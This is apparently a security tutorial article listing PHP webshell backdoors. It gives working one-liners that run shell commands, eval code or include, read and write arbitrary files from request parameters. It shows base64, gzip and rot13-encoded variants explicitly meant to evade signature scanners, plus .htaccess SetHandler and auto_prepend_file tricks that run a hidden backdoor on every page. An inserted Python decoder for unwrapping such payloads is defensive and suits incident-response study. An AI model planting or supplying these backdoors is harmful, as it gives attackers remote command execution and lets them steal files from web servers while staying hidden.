PHP webshell Trojans are familiar to everyone, but how many kinds do you know? The functions a PHP backdoor relies on fall into four groups:
1. Executing system commands: system, passthru, shell_exec, exec, popen, proc_open
2. Code execution and encoding (obfuscation, not real encryption): eval, assert, call_user_func, base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. File inclusion and file creation: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file
1. Executing system commands:
system function
// test.php?cmd=ls
system($_GET['cmd']);
passthru function
// test.php?cmd=ls
passthru($_GET['cmd']);
shell_exec function
// test.php?cmd=ls
echo shell_exec($_GET['cmd']);
exec function
// test.php?cmd=ls
// exec() returns only the last output line unless an output array is passed
$arr = array();
exec($_GET['cmd'], $arr);
print_r($arr);
popen function
// test.php?cmd=ls
$handle = popen($_GET['cmd'], 'r');
$read = fread($handle, 2096);
echo $read;
pclose($handle);
proc_open function
// test.php?cmd=ls
$descriptorspec = array(
    0 => array('pipe', 'r'),   // child's stdin
    1 => array('pipe', 'w'),   // child's stdout
    2 => array('pipe', 'w'),   // child's stderr
);
$proc = @proc_open($_GET['cmd'], $descriptorspec, $pipes);
fclose($pipes[0]);
$output = array();
while (!feof($pipes[1])) array_push($output, rtrim(fgets($pipes[1], 1024), "\n"));
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($proc);
print_r($output);
2. Code execution and encoding:
eval function
// The most common Trojan
eval($_POST['cmd']);
base64_decode function
// Encode the payload to evade signature scanning and hide what it does
// Decodes to: eval($_POST['cmd']);
eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
gzinflate function
// Encode the payload to evade signature scanning and hide what it does
// Decodes to: eval($_POST['cmd']);
eval(gzinflate(base64_decode('Sy1LzNFQiQ/wDw6JVk/OTVGP1bQGAA==')));
gzuncompress function
// Encode the payload to evade signature scanning and hide what it does
// Decodes to: eval($_POST['cmd']);
eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));
gzdecode function
// Encode the payload to evade signature scanning and hide what it does
// Decodes to: eval($_POST['cmd']);
eval(gzdecode(base64_decode('h4siaaaaaaaaa0sts8zruikp8a8oivzpzk14259w0bga5yqfaaaaa=')));
str_rot13 function
// Encode the payload to evade signature scanning and hide what it does
// Decodes to: eval($_POST[cmd]);
eval(str_rot13('riny($_CBFG[pzq]);'));
assert function
// Works like eval on PHP 5 and 7; PHP 8 no longer evaluates a string passed to assert()
assert($_POST['cmd']);
call_user_func function
// Call assert through call_user_func
call_user_func('assert', $_POST['cmd']);
call_user_func function
// Call any function through call_user_func
// test.php?a=assert&cmd=phpinfo()
call_user_func($_GET['a'], $_REQUEST['cmd']);
Combined form
// Call any function by using request data as the function name (a variable function)
// test.php?a=assert&cmd=phpinfo()
$_GET['a']($_REQUEST['cmd']);
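Every encoded sample in this group decodes to the same eval() line, and the first thing a responder does with such a file is peel the wrappers off. The Python below is an added example, not code from the original article: it recognizes the five wrapper functions listed above, applies the matching standard-library decoder (raw DEFLATE for gzinflate, zlib format for gzuncompress, gzip for gzdecode) and repeats until the innermost argument is no longer a string literal, so stacked layers come off as well. It assumes the ciphertexts keep their original upper and lower case; the encode_like_php helper, which is also an addition, rebuilds samples in the same shape so the decoder can be checked on freshly generated input.

```python
import base64
import codecs
import gzip
import re
import zlib

# The PHP "decoder" wrappers from the samples above, mapped to Python equivalents:
# gzinflate() is raw DEFLATE (no header), gzuncompress() is zlib format, gzdecode()
# is gzip.  PHP's base64_decode() tolerates missing padding, so it is restored here.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b + b"=" * (-len(b) % 4)),
    "gzinflate": lambda b: zlib.decompress(b, -15),
    "gzuncompress": zlib.decompress,
    "gzdecode": gzip.decompress,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}


def _deflate_raw(b):
    c = zlib.compressobj(6, zlib.DEFLATED, -15)  # -15: raw DEFLATE, like PHP gzdeflate()
    return c.compress(b) + c.flush()


# Inverse of each decoder, used only to build test samples shaped like the page's.
ENCODERS = {
    "base64_decode": base64.b64encode,
    "gzinflate": _deflate_raw,
    "gzuncompress": zlib.compress,
    "gzdecode": lambda b: gzip.compress(b, mtime=0),
    "str_rot13": DECODERS["str_rot13"],  # rot13 is its own inverse
}

CALL_RE = re.compile(r"^\s*(\w+)\s*\((.*)\)\s*$", re.S)
LITERAL_RE = re.compile(r"""^\s*(['"])(.*)\1\s*$""", re.S)


def split_layers(code):
    """eval(gzinflate(base64_decode('x'))); -> (['eval', 'gzinflate', 'base64_decode'], "'x'")."""
    expr = code.strip()
    if expr.startswith("<?php"):
        expr = expr[len("<?php"):]
    if expr.endswith("?>"):
        expr = expr[:-2]
    expr = expr.strip().rstrip(";")
    names = []
    while True:
        m = CALL_RE.match(expr)
        if not m:
            return names, expr.strip()
        names.append(m.group(1))
        expr = m.group(2)  # greedy match, so this is the full argument of the outer call


def unwrap(code, max_depth=16):
    """Peel decoder layers until the innermost argument is no longer a string literal.
    Returns (final PHP code, list of decoders applied, outermost first)."""
    layers = []
    for _ in range(max_depth):
        names, inner = split_layers(code)
        lit = LITERAL_RE.match(inner)
        wrappers = names[1:] if names and names[0] in ("eval", "assert") else names
        if lit is None or not wrappers or any(n not in DECODERS for n in wrappers):
            return code.strip(), layers
        # undo PHP single-quote escaping (\' and \\) before decoding
        data = re.sub(r"\\(['\\])", r"\1", lit.group(2)).encode("latin-1")
        for name in reversed(wrappers):  # the innermost call runs first
            data = DECODERS[name](data)
        layers.extend(wrappers)
        code = data.decode("latin-1")
    raise ValueError("more than %d layers of encoding" % max_depth)


def encode_like_php(plain, chain):
    """Wrap `plain` like the samples above; chain=('gzinflate', 'base64_decode') gives
    eval(gzinflate(base64_decode('...')));  End the chain with base64_decode or str_rot13
    so the payload stays printable."""
    data = plain.encode("latin-1")
    for name in chain:  # the outermost decoder's inverse is applied first
        data = ENCODERS[name](data)
    payload = re.sub(r"(['\\])", r"\\\1", data.decode("latin-1"))
    return "eval(%s('%s')%s);" % ("(".join(chain), payload, ")" * (len(chain) - 1))


if __name__ == "__main__":
    sample = "eval(gzuncompress(base64_decode('eJxLLUvM0VCJD/APDolWT85NUY/VtAYARQUGOA==')));"
    print(unwrap(sample))
```

The loop stops as soon as the innermost argument is an expression such as $_POST['cmd'] rather than a literal, which is exactly the point where a static unwrapper has nothing left to do and the remaining code must be read by hand.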
3. File inclusion and file creation:
require function
// Include any file (the included file is executed as PHP whatever its extension)
// test.php?file=123.jpg
require($_GET['file']);
require_once function
// Include any file
// test.php?file=123.jpg
require_once($_GET['file']);
include function
// Include any file
// test.php?file=123.jpg
include($_GET['file']);
include_once function
// Include any file
// test.php?file=123.jpg
include_once($_GET['file']);
file_get_contents function
// Read any file
// test.php?f=config.inc.php
echo file_get_contents($_GET['f']);
file_put_contents function
// Write a file with any content
// a=test.php&b=<?php eval($_POST[cmd]);?>
file_put_contents($_GET['a'], $_GET['b']);
fputs function
// Write a file with any content
// a=test.php&b=<?php eval($_POST[cmd]);?>
fputs(fopen($_GET['a'], "w"), $_GET['b']);
4. .htaccess:
SetHandler
// Save the PHP code in a file with a non-PHP extension, for example x.jpg
// Write the following into .htaccess
// Requesting x.jpg then runs the backdoor
<FilesMatch "x.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
auto_prepend_file
// Save the PHP code in a file with a non-PHP extension, for example 123.gif
// Write the following into .htaccess; the file path must be absolute
// Requesting any PHP file on the site then runs the backdoor before that file
// Because the prepended file runs ahead of every script, it can log every $_REQUEST without touching the site's source, or backdoor every page at once
// php_value only takes effect when PHP runs as an Apache module (mod_php); under PHP-FPM/FastCGI the same setting goes into a .user.ini file instead
php_value auto_prepend_file c:/apache2/htdocs/123.gif
auto_append_file
// Works like auto_prepend_file, except the file runs after the script instead of before it
// Save the PHP code in a file with a non-PHP extension, for example 123.gif
// Write the following into .htaccess; the file path must be absolute
// Requesting any PHP file on the site then runs the backdoor
php_value auto_append_file c:/apache2/htdocs/123.gif